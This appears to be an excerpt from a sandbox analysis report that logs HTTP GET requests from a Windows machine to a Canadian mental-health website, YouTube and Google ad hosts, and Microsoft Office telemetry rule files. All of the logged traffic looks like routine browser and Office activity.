Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/Thrive_infographic_EN3%20%283%29.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/twitter-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/css/img/icons8-search-28.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/sddefault.webp HTTP/1.1host: i.ytimg.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/FOH%20-%20Favicon.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
Source: global traffic HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1host: otelrules.svc.static.microsoftaccept-encoding: identityuser-agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
